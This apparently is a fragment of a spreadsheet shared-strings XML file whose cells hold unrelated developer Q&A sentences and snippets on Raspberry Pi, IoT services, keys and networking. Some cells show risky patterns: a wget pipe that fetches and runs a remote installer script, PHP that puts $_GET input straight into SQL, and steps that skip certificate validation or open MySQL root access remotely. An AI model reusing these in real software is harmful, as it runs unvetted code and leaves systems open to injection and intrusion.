    <t>If you want to expose a file over HTTP, then move it inside the DocumentRoot or configure an Alias to map a URL onto the file.</t>
  </si>
  <si>
    <t>Mentioning this capability for your Agent when registering with BlueZ means, instructing BlueZ (bluetoothd) not to call any Agent API for authentication.</t>
  </si>
  <si>
    <t>Problem
Error  means that NetworkInfo.isConnected() returns false
Indicates whether network connectivity exists and it is possible to
  establish connections and pass data.</t>
  </si>
  <si>
    <t>If a parameter in the constructor has the same name as one of the members, the ambiguity of that identifier being passed in a constructor call inside the initializer list is resolved choosing the parameter (and not the member).</t>
  </si>
  <si>
    <t>I also tried to create a function let's say void SMS and call it in the checkPassword function but it doesn't solve the problem, btw the same function when called in the void setup works fine.</t>
  </si>
  <si>
    <t>Now if I try to change it using the  method from the pi-rc522 library, it raises an Index Error because each block has to be 16 bytes, but the authentication key is only 6 bytes long.</t>
  </si>
  <si>
    <t>nano / etc/gdm3/daemon.conf
[Daemon]
AutomaticLoginEnable = true
AutomaticLogin = kiosk
We have chosen to configure, program, if necessary
-Screen calibration when not loaded up the whole screen:
/ Boot / config.txt file, clear the comment:
disable_overscan = 1
I hope I helped</t>
  </si>
  <si>
    <t>Generating a pair of colliding messages is one thing; generating a pair of private keys whose public keys have the same hash is quite another.</t>
  </si>
  <si>
    <t>If no options are used, javap prints out the package, protected, and public fields and methods of the classes passed to it.</t>
  </si>
  <si>
    <t>However if you want to find out your public IP from the command line, this should do the trick:</t>
  </si>
  <si>
    <t>In the HTTP protocol, a user agent identifies itself to the server using a user-agent string.</t>
  </si>
  <si>
    <t>I have to get twin info from azure-iothub.registry.getTwin("deviceId), the problem is that I have to pass proxy config to be able to contact azure.</t>
  </si>
  <si>
    <t>In this
case you could simply execute the following command:   
to create an empty file called ssh in the boot directory of the SD card.</t>
  </si>
  <si>
    <t>Conveniently, passing an invalid value, will return a zero, so you can write a get function that also asserts next != 0.</t>
  </si>
  <si>
    <t>Update: I have tried to do chmod 775 /boot/config.txt and also symlink (ran successfully) so i have a shortcut in  however when trying to save the php script into config.txt (in www) still get permission denied even though that shortcut is set to 775.</t>
  </si>
  <si>
    <t>Contents of wpa_supplicant.conf
Contents of /etc/network/interfaces
auto lo
iface lo inet loopback
iface eth0 inet dhcp
allow-hotplug wlan0
auto wlan0
iface wlan0 inet manual
#address 192.168.1.16
#netmask 255.255.255.0
#gateway 192.168.1.1
#dns-nameservers 192.168.1.1 8.8.8.8 8.8.4.4 4.4.4.4
#wpa-ssid ***
#wpa-psk ***
wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
I was using static ip when everything was working.</t>
  </si>
  <si>
    <t>You can skip the validation with skip_validation():
$this-&gt;user_model-&gt;skip_validation();
$this-&gt;user_model-&gt;insert(array( 'email' =&gt; 'blah' ));
Alternatively, pass through a TRUE to insert():
$this-&gt;user_model-&gt;insert(array( 'email' =&gt; 'blah' ), TRUE);
Under the hood, this calls validate().</t>
  </si>
  <si>
    <t>Spring Security is also integrated with many other Spring technologies, including Spring Web Flow, Spring Web Services and Pivotal tc Server.</t>
  </si>
  <si>
    <t>You may need to add the correct key to your agent by selecting Tools &gt; Add SSH Key which I did but the passphrase never matches so I cannot add my key.</t>
  </si>
  <si>
    <t>This alludes to there being a way to safely create the key pair, and transmit the private key to the device programatically for thousands of new devices rather than by hand for each device.</t>
  </si>
  <si>
    <t>After invoking those commands I end up with following files:
ca.crt     ca.key     ca.srl     device.crt device.csr device.key
So what I would do is to add ca.crt as registry certificate and then when I try to upload device.crt as device certificate (type RS256_X509) I get an error Certificate is not supported by Cloud IoT
What could I be doing wrong?</t>
  </si>
  <si>
    <t>Spring Cloud Consul features:
Service Discovery: instances can be registered with the Consul agent and clients can discover the instances using Spring-managed beans
Supports Ribbon, the client side load-balancer via Spring Cloud Netflix
Supports Zuul, a dynamic router and filter via Spring Cloud Netflix
Distributed Configuration: using the Consul Key/Value store
Control Bus: Distributed control events using Consul Events
https://cloud.spring.io/spring-cloud-consul/</t>
  </si>
  <si>
    <t>You can create a privileged container (by adding --privileged to the docker run command line), but that's generally a bad idea (because that container now has unrestricted root access to your host).</t>
  </si>
  <si>
    <t>sudo sh -c 'echo "deb http://packages.ros.org/ros/ubuntu trusty main" &gt; /etc/apt/sources.list.d/ros-latest.list'
and add public key to the ROS package.</t>
  </si>
  <si>
    <t>Full API
All of Heroku's functionality can be accessed from the command line (via the Heroku gem), including managing SSH keys, increasing or decreasing the number of dynos, managing SSL certificates, adding or removing add-ons, and more.</t>
  </si>
  <si>
    <t>&lt;( wget -O - https://code.headmelted.com/installers/apt.sh )
(And BTW, if you look at the script code, you'll see that there is a commented out line with exactly the `--allow-authenticated' option )</t>
  </si>
  <si>
    <t>This line is invalid Lua code.</t>
  </si>
  <si>
    <t>To remove "someKey" from twin JSON
assign the null value to "someKey", then only it get removed from device twin JSON.</t>
  </si>
  <si>
    <t>Basic usage is very simple: Create a Resty instance, use authenticate method to add credentials, then call one of the content type specific methods.</t>
  </si>
  <si>
    <t>What I really dont understand is how to add a pairing private/public key to the whole communication which I assume is the best practice way to do this?</t>
  </si>
  <si>
    <t>So far so good it works and i can connect again if everyone is in the same network, but now i want to access the server over the internet as a private person cant geht their hands on an public static ip adress, ive read that i could use ddns.</t>
  </si>
  <si>
    <t>call New-AzureRmStreamAnalyticsJob as you normally would then Invoke-WebRequest -Method Patch -Uri ...
--Edit--
The Invoke-WebRequest was a no-go -- far too much authentication to try to replicate/emulate.</t>
  </si>
  <si>
    <t>.config         .gvfs        quick2wire-python-api
    ..             .dbus           i2clibraries .Xauthority
    .bash_history  .Desktop        .idlerc      .xsession-errors
    .bashrc        .gpio.sh        .local
    .cache         .gstreamer-0.10 .profile
with i2c* and .quick* being the two libraries downloaded from thinkbowl.</t>
  </si>
  <si>
    <t>When Enter is inputted  should be called with IP String as argument.</t>
  </si>
  <si>
    <t>You can tokenize (split) the string on the comma using strtok, and then parse the numbers using sscanf.</t>
  </si>
  <si>
    <t>:
/usr/local/sbin/cronjobs/virtualenv/secret_ciphers/bin/python3
  /usr/local/sbin/cronjobs/csgostatsbot/CSGO_STATS_BOT_TASK.py &gt;
  /tmp/botlog.log 2&gt;&amp;1
And see if that yields any additional info.</t>
  </si>
  <si>
    <t>The AWSIoTKeychain class contains methods for importing keys, and the AWSIoTManager -createKeysAndCertificateFromCsr: method imports the certificate into the keychain.</t>
  </si>
  <si>
    <t>You create a cert of this private Key and it is AWS IoT use to identify the ccerts created by your private rootCA.</t>
  </si>
  <si>
    <t>For example:
manager.py
server.py
client.py
from multiprocessing import Process
from multiprocessing.managers import BaseManager
from manager import Camera, CameraManager
if __name__ == "__main__":
    manager = CameraManager(address=('127.0.0.1', 50000), authkey=b'hello')
    manager.connect()
    CameraManager.register("getCamera")
    camera = manager.getCamera("camera01")
    print("data = %s" % (camera.speak()))
And here is result I was tested:
$ python3 server.py
And run two process for client.py
$ python3 client.py
At that time my server.py will be
python3 server.py
Create New Camera
Debug
Exist Camera
Exist Camera
I was learned this tutorial from This Stackoverflow Thread.</t>
  </si>
  <si>
    <t>As per the official Raspberry Pi documentation, I am making use of the wpa_passphrase command, in which I can input the ESSID and password of my desired network and then append it's output onto the end of the existing /etc/wpa_supplicant/wpa_supplicant.conf file, before reloading the settings with wpa_cli -i wlan0 reconfigure.</t>
  </si>
  <si>
    <t>EDIT:
Adding the PHP script as well
&lt;?php
$servername = "localhost";
$username = "root";
$password = "*************";
$dbname = "testbox1";
try {
    $conn = new PDO("mysql:host=$servername;dbname=$dbname", $username, $password);
    // set the PDO error mode to exception
    $conn-&gt;setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $temp = $_GET["temp"];
    $light = $_GET["light"];
    $sql = "INSERT INTO sensor (temp, light)
    VALUES ('$temp', '$light')";
    // use exec() because no results are returned
    $conn-&gt;exec($sql);
    echo "New record created successfully";
    }
catch(PDOException $e)
    {
    echo $sql .</t>
  </si>
  <si>
    <t>EDIT: Just added the ssl encryption when connecting to the server, but still not changing password
EDIT2: Made it print the connection results and get this back:
{'result': 32, 'description': 'noSuchObject', 'dn': 'OU=Users,DC=DC,DC=local', 'message': "0000208D: NameErr: DSID-0310020A, problem 2001 (NO_OBJECT), data 0, best match of:\n\t'OU=Users,DC=DC,DC=local'\n\x00", 'referrals': None, 'type': 'modifyResponse'}
Am I right in saying it's completely ignoring the CN?</t>
  </si>
  <si>
    <t>.F....ID 228,66-851,212 #7f070042 app:id/message} softInputMode=288 first=true flags=#81810100
D/OpenGLRenderer: ProgramCache.generateProgram: 103084458052
D/NetworkSecurityConfig: No Network Security Config specified, using platform default
I/System.out: [socket][0] connection /192.168.43.76:80;LocalPort=-1(0)
              [ 02-07 22:40:39.251 29396:29665 D/         ]
              [Posix_connect Debug]Process com.example.access.test123 :80 
I/System.out: [socket][/192.168.43.1:49348] connected
I/System.out: [OkHttp] sendRequest&gt;&gt;
I/System.out: [OkHttp] sendRequest&lt;&lt;
D/Error2: java.net.ProtocolException: Unexpected status line: Test_Sucessfull
D/WindowClient: Add to mViews: android.widget.LinearLayout{3957537 V.E......</t>
  </si>
  <si>
    <t>If you're going to create a package for Windows Store submission, you could associate your project with Store and all the identity info in Package manifest will match the value in Dev Center (including  and package identity name).</t>
  </si>
  <si>
    <t>I try to concatenate the output of AES-256 encryption to a string (to compare this string against the encrypted String sent from an Android phone).</t>
  </si>
  <si>
    <t>This would be a solution that establishes a connection from inside your local network, to a front-end service outside of your network, and would allow traffic to go to your pi via a public-facing address.</t>
  </si>
  <si>
    <t>I was under the misguided notion that all methods in a custom Arduino library should be exposed either as Public or Private in the header file, whereas only methods that need to be shared need be exposed.</t>
  </si>
  <si>
    <t>I tried adding the script to /etc/init.d but I do not think it will run either way if the pi requires login info upon booting.</t>
  </si>
  <si>
    <t>$ sudo nano /etc/network/interfaces
Add the line auto eth0 just before the existing line iface eth0 inet manual.</t>
  </si>
  <si>
    <t>For questions about creating, publishing, and consuming "private" NPM modules/packages.</t>
  </si>
  <si>
    <t>dockerfile: Test/Dockerfile
    privileged: true
    restart: always
    tty: true
    network_mode: host
    cap_add:
     - SYS_RAWIO
    devices:
     - "/dev/i2c-1:/dev/i2c-1"
     - "/dev/mem:/dev/mem"
     - "/dev/ttyACM0:/dev/ttyACM0"
Dockerfile =&gt;
FROM balenalib/armv7hf-debian-python:3-stretch
RUN apt-get update &amp;&amp; \
    apt-get install -y python-smbus \
    i2c-tools \
    kmod \
    ntpdate
ENV INITSYSTEM=on
ENV DBUS_SYSTEM_BUS_ADDRESS unix:path=/host/run/dbus/system_bus_socket
USER root
ENV UDEV=on
WORKDIR /usr/src/app/Test
COPY Test .</t>
  </si>
  <si>
    <t>collect all chars of the first line
check if it is a GET request for a known url with a tricky secret
if so, use the code in the Arduino example to return a web page
if not, return noting.</t>
  </si>
  <si>
    <t>Guides:
Spring Guides and Tutorials
Video tutorial on Spring Framework
Spring's YouTube channel
Java Brains
Spring Tutorials Collections
Blog:
Spring Team Blog
Related tags
spring
spring-mvc
spring-security
spring-roo
spring-data
spring-integration
spring-webflow
spring-mobile
spring-social
spring-amqp
spring-portlet-mvc
spring-el
spring-batch
spring-boot
spring-xd
spring-android
spring-aop
spring-security
More information:
Spring Framework Wikipedia Article</t>
  </si>
  <si>
    <t>This info includes package identity, package dependencies, required capabilities, visual elements, and extensibility points.</t>
  </si>
  <si>
    <t>It should be used to allow a symmetric, secret key to be used on multiple plain texts, otherwise the mode of encryption could leak information on the (first part of) the plain text.</t>
  </si>
  <si>
    <t xml:space="preserve">
This alludes to there being a way to safely create the key pair, and 
  transmit the private key to the device programatically for thousands 
  of new devices rather than by hand for each device.</t>
  </si>
  <si>
    <t>- Source: System.Deployment
        - Stack trace:
            at System.Deployment.Application.DownloadManager.VerifyRequestedPrivilegesSupport(String requestedExecutionLevel)
            at System.Deployment.Application.DownloadManager.DownloadApplicationManifest(AssemblyManifest deploymentManifest, String targetDir, Uri deploymentUri, IDownloadNotification notification, DownloadOptions options, Uri&amp; appSourceUri, String&amp; appManifestPath)
            at System.Deployment.Application.ApplicationActivator.DownloadApplication(SubscriptionState subState, ActivationDescription actDesc, Int64 transactionId, TempDirectory&amp; downloadTemp)
            at System.Deployment.Application.ApplicationActivator.InstallApplication(SubscriptionState&amp; subState, ActivationDescription actDesc)
            at System.Deployment.Application.ApplicationActivator.PerformDeploymentActivation(Uri activationUri, Boolean isShortcut, String textualSubId, String deploymentProviderUrlFromExtension, BrowserSettings browserSettings, String&amp; errorPageUrl)
            at System.Deployment.Application.ApplicationActivator.ActivateDeploymentWorker(Object state)
COMPONENT STORE TRANSACTION DETAILS
    No transaction information is available.</t>
  </si>
  <si>
    <t>connectOptions.setUserName("unused-but-necessary");
            connectOptions.setPassword(passwordGenerator.createJwtRsaPassword());
            IMqttToken iMqttToken = client.connect(connectOptions);
            iMqttToken.setActionCallback(new IMqttActionListener() {
                @Override
                public void onSuccess(IMqttToken asyncActionToken) {
                    Log.d("TUT", "success, connected");
                }
                @Override
                public void onFailure(IMqttToken asyncActionToken, Throwable exception) {
                    Log.e("TUT", "failure, not connected", exception);
                }
            });
            iMqttToken.waitForCompletion(TimeUnit.SECONDS.toMillis(30));
            Log.d("TUT", "IoT Core connection established.</t>
  </si>
  <si>
    <t>IMPORTANT: Make sure that your Arduino never puts out a digital 1 on the Arduino pin connected to the bluetooth module status pin: these bluetooth modules run on 3.3V, and connecting any unprotected pins to 5V will be damaging.</t>
  </si>
  <si>
    <t>Register method and implement method call back:
I get "Timed out waiting for device to connect" error when I stop my module by using the following command:
Error from portal:
But in your error message, there is "not registered" information.</t>
  </si>
  <si>
    <t>This process is
  implemented through a flexible system
  of "pipes", which handle distinct
  tasks such as tokenizing strings,
  removing stopwords, and converting
  sequences into count vectors.</t>
  </si>
  <si>
    <t>Therefore, you will have to follow the URI Record Type Definition to decode the payload into a proper URI before using it:
Be aware that there a still a few issues with the solution above:
The string part of the URI (bytes starting at offset 1) is actually UTF-8 encoded.</t>
  </si>
  <si>
    <t>You need to create, within the .hg directory on the SERVER a file called hgrc and put this in it:
[web]
push_ssl = false
allow_push = *
Now, from what I understand, you should ONLY do this on a trusted network.</t>
  </si>
  <si>
    <t>Masked arrays are NumPy arrays that may have missing or invalid entries.</t>
  </si>
  <si>
    <t>I want to add a my private profile and its cluster into an End-Device module so that when I start discovery on Coordinator side.</t>
  </si>
  <si>
    <t>But when the node process starts it throws the error invalid ELF header: 
To debug if the error was somehow related to the platform architecture, I added the command RUN uname -a both in the dockerfile and in the node's application code.</t>
  </si>
  <si>
    <t xml:space="preserve">
Add the Certificate file your Project 
Add the Certificate to the Manifested file  (give file path in attachment)
the Frist Service Call of in Ur Project use to ignore the certificate validation Following Code is most Suitable for Login Function.</t>
  </si>
  <si>
    <t>You need to locate the file FMX.Context.GLES.pas in your source folder of your embarcadero installation directory and find the line with the code:
Replace this line with:
if (Flag &lt;&gt; GL_NO_ERROR) and (Flag &lt;&gt; GL_INVALID_VALUE) then
After that you need to add this modified file in your project and then compile.</t>
  </si>
  <si>
    <t>Is it possible to add the authorization string to the url?</t>
  </si>
  <si>
    <t>That can be done via cf console, as such:
1) Install cf
https://console.bluemix.net/docs/cli/reference/ibmcloud/download_cli.html#install_use
2) Run below commands:
ibmcloud login -a https://api.ng.bluemix.net
ibmcloud target --cf-api https://api.ng.bluemix.net -o projetos.frondizi@gmail.com -s dev
ibmcloud resource service-alias-create iot-cloudat-alias --instance-name 'Cloudant-zw'
If successful, you can see the alias under the IoT service in the IBM Cloud dashboard.</t>
  </si>
  <si>
    <t>Here's my login.php code:
If I comment out the lines where the variable  is used and uncomment the echo command, the script works.</t>
  </si>
  <si>
    <t>I am writing a unit test for embedded C codes using google test/mock.</t>
  </si>
  <si>
    <t>I have checked the password file, which seems to be correct (it has the right name and path /etc/mosquitto/passwd &amp; contains an entry for my user "test").</t>
  </si>
  <si>
    <t>and will split in
and split it again in key and values
ssid
SSID
pwd
PASSWORD
userId
1234
I tried to use strtok for the first split.</t>
  </si>
  <si>
    <t>The goal is to encrypt some data using AES-CTR then decrypt the cypher-text back to the original plain-text.</t>
  </si>
  <si>
    <t>For the next calls, use
token = strtok(NULL, ",");
Note the NULL value.</t>
  </si>
  <si>
    <t>1) 
2) # bind-address = 127.0.0.1     // comment this line out
3) sudo /etc/init.d/mysql restart  //restart mysql
4) sudo mysql -u root -p          //login to mysql cli as user 'root'
5) GRANT ALL PRIVILEGES ON *.</t>
  </si>
  <si>
    <t>But at least these values won't be in plain text or cipher text in your sketch.</t>
  </si>
  <si>
    <t>From the commandline args, it looks like you're passing in rsa_cert.pem, which is your SSL private key.</t>
  </si>
  <si>
    <t>Anywhere the string user appears in the below commands for changing directories, just replace that with your username in Linux.</t>
  </si>
  <si>
    <t>This means that your calls to uart_write_bytes() (even though invalid) are not the cause of the reset - because you did not pass the address 0x00000055 in any of the calls.</t>
  </si>
  <si>
    <t>So this worked for me:
You'll obviously need to replace "test.example.com" with the URL for your secure MQTT server...</t>
  </si>
  <si>
    <t>A Safe navigation operator which is used to test for null before performing a member access (?.)</t>
  </si>
  <si>
    <t>Mutation testing is a method of testing the adequacy of test suites.</t>
  </si>
  <si>
    <t>If a value fails your validation tests, then isValid() should return FALSE.</t>
  </si>
  <si>
    <t>Our test then becomes
if( 0 == false )
Type coercion nails us here because 0 is coerced into false in PHP.</t>
  </si>
  <si>
    <t>Anyone can produce a matching pair of different keys (public and private).</t>
  </si>
  <si>
    <t>Im using the following code to update the device twin:
Ive also tried using iothub-explorer using the following command:
        iothub-explorer update-twin InitialDevice {\"properties\":{\"desired\":
    {\"interval\":9000}}} --login ""</t>
  </si>
  <si>
    <t>In order for an entity's signature to be generated for a file, the entity must first have a public/private key pair associated with it, and also one or more certificates authenticating its public key.</t>
  </si>
  <si>
    <t>Following is the environment:
iOS Version: 8.0 / 9.0
Programming language: Swift
Library for MQTT: Moscapsule
Steps followed:
Set initial config clientid, host, port
Set client certificate with private key, providing .pem file path (e.g.</t>
  </si>
  <si>
    <t>The ASDoc tool parses one or more actionscript-3 class definitions and mxml files, and generates API language reference documentation for all public and protected methods and properties, and for all [Bindable], [DefaultProperty], [Event], [Style], and [Effect] metadata tags.</t>
  </si>
  <si>
    <t>");
        // Reference for CheckRead Event
        _cC.CheckRead += OnCheckRead;
    }
    private void button_Click(object sender, RoutedEventArgs e)
    {        
        _eldb.attachEvent("S1001", "Login Activated.</t>
  </si>
  <si>
    <t>Running the application on Raspbian Stretch, results in error stating the libssl.so.1.0.0 cannot be found.</t>
  </si>
  <si>
    <t>If you've got the key pair, the certificate PEM, certificate ID, and the certificate ARN, you can use the AWS Mobile SDK for iOS's IoT classes as a reference while implementing code for importing these into the keychain.</t>
  </si>
  <si>
    <t>Every time you reconnect you must un-pair and re-pair, because on Windows 10 your device is paired, but your device is not.</t>
  </si>
  <si>
    <t>If you have a add an event such as "BomNotScanned" which doesn't have an Event argument class associated with it, then you can raise that event and whatever handles it for the specific scenario of the SKU/UPC not being scanned.</t>
  </si>
  <si>
    <t>Note that it is generally necessary to override the hashCode() method whenever this method is overridden, so as to maintain the general contract for the hashCode() method, which states that equal objects must have equal hash codes.</t>
  </si>
  <si>
    <t>token
in this code:
The cpp library file:
the .h header file:
#ifndef StepperMotor_h
#define StepperMotor_h
#include "Arduino.h"
class StepperMotor
{
    public:
            StepperMotor(int pin1, int pin2);
     void moveDegrees(int degreeNumber);
    private:
     void stepDegrees(bool dir, int steps);
         int dirPin;
         int stepPin;
         float userAbs;
         float stepNumber;
};
#endif
When I am trying to implement my own library files.</t>
  </si>
  <si>
    <t>If I allow wifiConnect to run GetFileData it will stop with
&lt;pre&gt;
    PANIC: unprotected error in call to Lua API (not enough memory)
&lt;/pre&gt;
loading GetServerData seems to consume 13816 bytes on the heap.. leaving 18800. surely enough to run.</t>
  </si>
  <si>
    <t>I was wondering if there's a way I can use NFC tag as authentication tool, so when the tag is tapped, it opens a url, connects to a remote database and checks if that is the original Tag and returns true or false.</t>
  </si>
  <si>
    <t>I/Binder:950_3: type=1400 audit(0.0:80): avc: denied { read } for name="interrupts" dev="proc" ino=4026532794 scontext=u:r:priv_app:s0:c512,c768 tcontext=u:object_r:proc_interrupts:s0 tclass=file permissive=1
09-19 17:18:32.144 950-1129/com.google.android.gms.unstable W/System: ClassLoader referenced unknown path: /data/user/0/com.google.android.gms/app_U1rfdkMe/Mr,09vcaQ,w
09-19 17:18:32.150 950-1129/com.google.android.gms.unstable W/System: ClassLoader referenced unknown path: /data/user/0/com.google.android.gms/app_U1rfdkMe/Mr,09vcaQ,w
09-19 17:18:34.049 783-1305/com.google.android.gms.persistent I/VacuumService: Vacuum at: now=1505841514048 tag=VacuumService
09-19 17:18:34.223 783-783/com.google.android.gms.persistent I/Auth: [ReflectiveChannelBinder] Successfully bound channel!</t>
  </si>
  <si>
    <t>While installing Johnny-five package I got a message such as package-lock.json need to be committed, is it creating any issues?</t>
  </si>
  <si>
    <t>The default in Ruby is to use US-ASCII encoding for strings, which causes a string
validation check in the Ruby SOAP library to fail and your string to be sent
back as a Base-64 value, which may confuse clients that expected strings
because of the WSDL.</t>
  </si>
  <si>
    <t>Virtual private networks encapsulate data transfers using a secure cryptographic method between two or more networked devices (which are not on the same private network) to keep the transferred data private from other devices on the wide area networks.</t>
  </si>
  <si>
    <t>I have created certificates and I have downloaded them
1) Private certificate - which ends with key
2) Public certificate - which ends with key
3) Root CA - certificate and I have used - CA 1 recommended by AWS.</t>
  </si>
  <si>
    <t>For this, the event handler registration in ApiClient::ApiClient() has to be changed:
//ERROR: wifi.onEvent(WiFiEvent);
//Instead:
wifi.onEvent(
  [this](WiFiEvent_t event, system_event_info_t info) {
    this-&gt;WiFiEvent(event, info);
  });
This effectively registers a functor with the accepted signature which captures this of ApiClient so that a valid call of member function with instance can be done.</t>
  </si>
  <si>
    <t>I also tried ntlm, ntlmssp, and ntlmsspi authentication protocols (options listed in man mount.cifs are ntlm, ntlmi, ntlmv2, ntlmv2i, ntlmssp, ntlmsspi)
Testing server configuration
Since Windows Server 2016 does not explicitly state anywhere in its configuration program what version of SMB is being used, I used this command in PowerShell:
Get-SmbServerConfiguration | Select EnableSMB2Protocol
It returns True, which means SMBv2.0 is running (but this does not guarantee that a newer version is not running, afaik).</t>
  </si>
  <si>
    <t>Support for authentication (you can provide function when user enter login and password or if you use JSON-RPC it can automatically
call login function on the server and pass token to all functions)
Stack of interpreters - you can create commands that trigger additional interpreters (eg.</t>
  </si>
  <si>
    <t>Here's the error I'm getting:
I have an AuthHelper class:
And I have a GoogleCalendarHelper:
public GoogleCalendarHelper() {
    Calendar calendarAPIClient = new Calendar(new NetHttpTransport(), new JacksonFactory(), AuthHelper.mGoogleCredential);
    calendarAPIClient.events();
    Log.e("SOMETHING", "");
}
The code is being called from the onCreate method of my MainActivity.</t>
  </si>
  <si>
    <t>The pathname may contain the following tokens that are expanded at runtime: %% is replaced by a literal '%', %d is replaced by the home directory of the user being authenticated, and %u is replaced by the username of that user.</t>
  </si>
  <si>
    <t>After you upload and test your Sketch using the Arduino IDE you should be able to lock out access to the code with the following Avrdude command.</t>
  </si>
  <si>
    <t>Main features:
Scrape and parse HTML from a URL, file, or string
Find and extract data, using DOM traversal or CSS selectors
Manipulate HTML elements, attributes, and text
Sanitizing: Clean user-submitted content against a white-list, to prevent XSS attacks
Deal with all varieties of HTML found in the wild; from validating to invalid tag-soup
Output tidy HTML
SwiftSoup is available through CocoaPods, Carthage, and on GitHub.</t>
  </si>
  <si>
    <t>In your cpp:
you are redeclaring public members, so when you refer then inside constructor, you are acessing private copy instead of public class members.</t>
  </si>
  <si>
    <t>Like user @pskink said, 
Most likely your sampleRate (or any other parameter passed to the
  AudioTrack constructor) is invalid.</t>
  </si>
  <si>
    <t>In some programming languages there are functions which cannot be safely called on invalid input data, or functions which return values which cannot be distinguished from exceptions.</t>
  </si>
  <si>
    <t>The Pi boots to logged in command line.</t>
  </si>
  <si>
    <t>The format is the so-called Intel Binary format.</t>
  </si>
  <si>
    <t>Permissions are strings that are passed along with a login request or an API call.</t>
  </si>
  <si>
    <t>I have changed the following lines:
# default_user        simone 
# auto_login          no
to:
default_user        jon 
auto_login          yes
I have managed to get the slim login prompt to appear on boot by editing /etc/inittab, but the changes made for bypassing this have not been as successful.</t>
  </si>
  <si>
    <t>The problem is when I try to add another profile/service, after calling this function  Gatt event handler is called, but the app can not be registered, and appears status 128 (0x80) which is defined as ESP_GATT_NO_RESOURCES.</t>
  </si>
  <si>
    <t>I then added a user to the same role that is assigned to the lambda function and used those credentials directly in the ENV to override those passed by lambda.... and it works!!!</t>
  </si>
  <si>
    <t>As for booting, the following two wikis will give you the details of starting the Gui without manual login: 
https://wiki.archlinux.org/index.php/Automatic_login_to_virtual_console
https://wiki.archlinux.org/index.php/Start_X_at_Login
After that, it is simply a matter of putting the command to launch your program in .xinitrc.</t>
  </si>
  <si>
    <t>This could be removing invalid URL characters for use in a web address, or cleaning formatting of telephone numbers for use in a database.</t>
  </si>
  <si>
    <t>This class keeps its constructor private, and allows access to the seven instances by one class method (e.g.</t>
  </si>
  <si>
    <t>For ssh, this means setting up a key pair, and doing so without a pass phrase (since ssh-agent isn't there to unlock keys).</t>
  </si>
  <si>
    <t>My question is, how can that sensor node will be able to know that, the commander is authentic, not some adversary [that somehow knows the command format and sending the command pretending itself as commander]?</t>
  </si>
  <si>
    <t>HTTP GET call via Postman
As you can see the GET call results in an unauthorized IoTHubUnauthorizedAccess error code.</t>
  </si>
  <si>
    <t>I am sharing go code that generate private and public certificates in paired.</t>
  </si>
  <si>
    <t>Unless you have a private apn with the mobile operator you're using, you won't be able to reach your Ubuntu from a public IP.</t>
  </si>
  <si>
    <t>So apparently one of the parameters you specify is invalid or a parameter is missing.</t>
  </si>
  <si>
    <t>If you require administrator access you can type "RunAsAdmin " in the command line prompt.</t>
  </si>
  <si>
    <t>I recommend you to edit /etc/apt/sources.list with your favorite text editor in root (nano,vim,...), and writing this :
The # sign is just the way to commenting out a line in sources.list
When your done, download the public key and install it with this command :
If there is any problem, send the output :).</t>
  </si>
  <si>
    <t>Ruby 1.9 introduced new features like:
Per-string character encodings are supported
Block local variables (variables that are local to the block in which they are declared)
An additional lambda syntax
New socket API (IPv6 support)
require_relative import security</t>
  </si>
  <si>
    <t>Dropbox api v2 says they added functionality to download entire folders as zip files but whenever I try to implement the code given in the api and save the file locally, the local zip files always says it's corrupt and can't be opened.</t>
  </si>
  <si>
    <t>The WebMethod attribute is attached to a public method (cannot be attached to a private/protected) that you want the method exposed as part of the .NET Web service.</t>
  </si>
  <si>
    <t>Instead of the command bluez-simple-agent I used hcitool scan which showed my device:
bluez-test-device trusted &lt;MAC&gt; yes
This appeared to work as well but still no bt-devices.</t>
  </si>
  <si>
    <t>This is mostly because in a terminal environment, I can catch any keystrokes that someone would use to try to exit the game, and put a password up to prevent it.</t>
  </si>
  <si>
    <t>Bellow is the code from warnings.pm at the line 355(the last line from file)
Croaker("package '$category' not registered for
NUL NUL NUL NUL NUL 
and so on.</t>
  </si>
  <si>
    <t>The python script runs from the command line while logged in as user pi and exits gracefully into the background without issue.</t>
  </si>
  <si>
    <t>Here is a short example:
?threshold =&gt; returns '1400'
!threshold 1234
?threshold =&gt; nothing happens
?threshold =&gt; nothing happens
?threshold =&gt; returns 'unrecognized command ??</t>
  </si>
  <si>
    <t>For some reason one of the reported properties seems to have an empty string as a key (which should be an invalid key, I would think).</t>
  </si>
  <si>
    <t>Instead of , try to use if(( firstText.equals(username[i]) ) &amp;&amp; ( secondText.equals(password[i]) ))
I think the == don't compare the value of strings.</t>
  </si>
  <si>
    <t>Make action methods for your buttons, something like lockDoors, unlockDoors, openTrunk, in each call [self sendLockCommand:@"L"], each with the appropriate string.</t>
  </si>
  <si>
    <t>When you SSH to Windows 10 IoT Core, you are connected to the Windows Command Prompt and can execute Windows Commands such as shutdown.exe.</t>
  </si>
  <si>
    <t>As the solution, you can either download a fresh JDK and replace the current JDK or replace all the certificates in the .</t>
  </si>
  <si>
    <t>Because ( is shell metacharacter in an illegal position, the shell cannot parse this command line.</t>
  </si>
  <si>
    <t>The key is XOR'ed with the message to render the cipher text which can then be XOR'ed with the same key to get the plain text.</t>
  </si>
  <si>
    <t>URL validation checks if a given text is a URL or not.</t>
  </si>
  <si>
    <t>Security then depends only on keeping the private key private, and the public key may be published without compromising security.</t>
  </si>
  <si>
    <t>For now i have done those things:
I've create new account admin and add him to sudo and adm group: 
Next I've change a line in sudoers file from:
To this
pi ALL=(ALL) PASSWD: ALL
I have made another script that will start those two scripts so I can remove them from .profile (I thought that it will help somehow).</t>
  </si>
  <si>
    <t>Add a rule to drop invalid packets instead of allowing them to trigger RSTs: iptables -I INPUT -m conntrack --ctstate INVALID -j DROP
For me, the ip_conntrack_tcp_be_liberal would never hold its setting after reboot.</t>
  </si>
  <si>
    <t>I could imagine appending a query parameter to your query string in IFTTT containing a secure token, like 
However, one of the main problem of IFTTT is that it only supports the limited command set you supply.</t>
  </si>
  <si>
    <t>A Java ParseException gets raised whenever a ParseObject issues an invalid request, such as deleting or editing an object that no longer exists on the server, or when there is a network failure preventing communication with the Parse server.</t>
  </si>
  <si>
    <t>I had a problem after editing "/boot/cmdline.txt" which caused my pi to boot into safe mode.</t>
  </si>
  <si>
    <t>Creating a file named "login.txt" in the API does not cause the client to store a real file called "login.txt" on the local file system.</t>
  </si>
  <si>
    <t>My problem is when i try to connect to a network with credentials my app closes and i cannot catch it even with using try catch.App goes from screen ( rasberry pi 3 ) and debug session is lost.Instead it should return me connection failed invalid credentials.</t>
  </si>
  <si>
    <t>Afterwards we will use bluetoothctl:
